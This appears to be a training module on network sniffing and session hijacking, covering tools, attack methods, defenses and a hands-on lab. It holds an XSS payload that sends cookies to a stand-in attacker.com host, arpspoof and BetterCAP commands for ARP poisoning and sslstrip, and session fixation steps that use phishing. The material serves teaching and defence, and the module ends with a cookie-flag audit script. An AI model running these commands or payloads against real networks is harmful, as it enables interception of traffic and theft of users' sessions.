Introduction
Sniffing and session hijacking are critical network attacks where an attacker intercepts and manipulates network traffic to steal sensitive data or take over authenticated sessions. This guide covers techniques, tools, and defenses.
1. Network Sniffing
What is Sniffing?
- Capturing and analyzing network traffic.
- Used for passive reconnaissance (e.g., stealing passwords, cookies).
- Works on unencrypted (HTTP, FTP, Telnet) and weakly encrypted protocols.
Types of Sniffing
1. Passive Sniffing
- Works on hubs (broadcast traffic).
- Attacker silently captures packets.
2. Active Sniffing
- Works on switched networks, where the attacker must actively redirect traffic to their own port (typically via ARP spoofing).
- Techniques: ARP Poisoning, MAC Flooding, DNS Spoofing.
Sniffing Tools
| Tool | Purpose |
|------|---------|
| Wireshark | GUI-based packet analyzer |
| Tcpdump | Command-line packet capture |
| Ettercap | MITM (Man-in-the-Middle) attacks |
| BetterCAP | Advanced MITM framework |
| dsniff | Password sniffing |
How to Perform Sniffing?
Step 1: Set Up Promiscuous Mode
```bash
ifconfig eth0 promisc # Enable promiscuous mode
```
Step 2: Capture Traffic with Wireshark
- Open Wireshark → Select interface → Start capture.
- Apply filters (e.g., `http`, `ftp`, `tcp.port == 80`).
Step 3: Analyze Packets
- Look for plaintext passwords (HTTP, FTP).
- Extract cookies (`Cookie:` header in HTTP).
2. Session Hijacking
What is Session Hijacking?
- Stealing a valid session token (cookie, session ID) to impersonate a user.
- Common targets: Web apps, SSH, RDP, Telnet.
Types of Session Hijacking
| Type | Method |
| ------ | -------- |
| Predictable Session Tokens | Guessing weak session IDs |
| Session Sidejacking | Sniffing unencrypted cookies |
| Session Fixation | Forcing a victim to use attacker’s session ID |
| Cross-Site Scripting (XSS) | Stealing cookies via JavaScript |
| Man-in-the-Middle (MITM) | Intercepting and modifying traffic |
Session Hijacking Tools
| Tool | Purpose |
|------|---------|
| Burp Suite | Intercepting & modifying HTTP sessions |
| ZAP (OWASP) | Web app session hijacking |
| Ferret | Cookie hijacking tool |
| Hamster | Sidejacking tool (with Ferret) |
| Ettercap | MITM-based session hijacking |
How to Perform Session Hijacking?
Method 1: Cookie Theft via XSS
1. Inject malicious script:
```javascript
document.location='http://attacker.com/steal.php?cookie='+document.cookie;
```
2. Capture stolen cookie on attacker’s server (steal.php logs cookies).
Method 2: ARP Spoofing + Cookie Sniffing
1. ARP Poisoning (redirect traffic to attacker):
```bash
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
```
2. Use Wireshark or Ettercap to sniff cookies.
3. Modify browser cookies (Chrome DevTools → Application → Cookies).
Method 3: Session Fixation
1. Generate a fake session ID (PHPSESSID=attacker123).
2. Trick victim into using it (via phishing).
3. When victim logs in, attacker reuses the same session.
3. Defenses Against Sniffing & Hijacking
Preventing Sniffing
✔ Encrypt traffic (HTTPS, SSH, VPN).
✔ Disable unused protocols (Telnet, FTP).
✔ Use ARP spoofing detection (ARPWatch, XArp).
✔ Network segmentation (VLANs, firewalls).
Preventing Session Hijacking
✔ Use HTTPS (SSL/TLS) for all web traffic.
✔ Secure cookies (`HttpOnly`, `Secure`, `SameSite` flags).
✔ Regenerate session IDs after login.
✔ Implement CSRF tokens.
✔ Monitor abnormal logins (IP changes, multiple sessions).
4. Hands-On Lab
Lab: Stealing Cookies with BetterCAP
1. Install BetterCAP:
```bash
sudo apt install bettercap
```
2. Start ARP spoofing:
```bash
sudo bettercap -iface eth0
> net.probe on
> net.recon on
> arp.spoof on
```
3. Sniff HTTP traffic:
```bash
> set http.proxy.sslstrip true
> http.proxy on
```
4. Analyze stolen cookies in BetterCAP logs.
- Search logs for `Cookie:` or `Set-Cookie:` headers.
- Extract session tokens (e.g., `PHPSESSID`, `JSESSIONID`).
- Check for missing security flags (`Secure`, `HttpOnly`).
- Test cookie validity via `curl` or Burp Suite.
- Recommend HTTPS, secure flags, and HSTS to prevent future theft.
Stolen cookies enable session hijacking if unprotected.
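The check described in the lab's analysis step and in the "Preventing Session Hijacking" list can be automated. The script below is an added example, not code from the original page or from BetterCAP: it scans captured HTTP response lines for `Set-Cookie` headers and reports session cookies that lack the `Secure`, `HttpOnly` or `SameSite` protections. The list of session cookie names and the sample log lines are constructed for the example.

```python
import re

# Assumed list of common session cookie names (extend for your applications).
SESSION_COOKIE_NAMES = {"PHPSESSID", "JSESSIONID", "ASP.NET_SessionId", "session", "sid"}

def parse_set_cookie(value):
    """Split a Set-Cookie value into (name, attrs); attrs maps lower-cased
    attribute names to their values ('' for bare flags such as Secure)."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name, attrs

def audit_cookie(value):
    """Return (cookie name, list of weaknesses) for one Set-Cookie value."""
    name, attrs = parse_set_cookie(value)
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure (sent over plaintext HTTP, sniffable)")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly (readable via document.cookie in XSS)")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict (sent on cross-site requests)")
    return name, findings

def audit_log(lines):
    """Scan captured response lines and return {session cookie: [findings]}
    for every session cookie that is missing at least one protection."""
    report = {}
    for line in lines:
        m = re.search(r"Set-Cookie:\s*(.+)", line, re.IGNORECASE)
        if m:
            name, findings = audit_cookie(m.group(1))
            if name in SESSION_COOKIE_NAMES and findings:
                report[name] = findings
    return report

# Constructed sample lines standing in for a BetterCAP/Wireshark capture.
SAMPLE_LOG = [
    "HTTP/1.1 200 OK",
    "Set-Cookie: PHPSESSID=abc123; Path=/",
    "Set-Cookie: theme=dark; Path=/",
    "Set-Cookie: JSESSIONID=def456; Path=/; Secure; HttpOnly; SameSite=Lax",
]

if __name__ == "__main__":
    for cookie, issues in audit_log(SAMPLE_LOG).items():
        print(f"{cookie}: " + "; ".join(issues))
```

Only `PHPSESSID` is reported for the sample input: `theme` is not a session cookie and `JSESSIONID` carries all three protections.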
Conclusion
- Sniffing = Capturing unencrypted traffic.
- Session Hijacking = Stealing active sessions.
- Defenses = Encryption, secure cookies, monitoring.
🔹 Next Steps:
Module 7: Web Application Hacking
- Try HTTPS decryption (SSLstrip, mitmproxy).
- Explore browser security (CSP, HSTS).
- Practice on CTF challenges (Hack The Box, TryHackMe).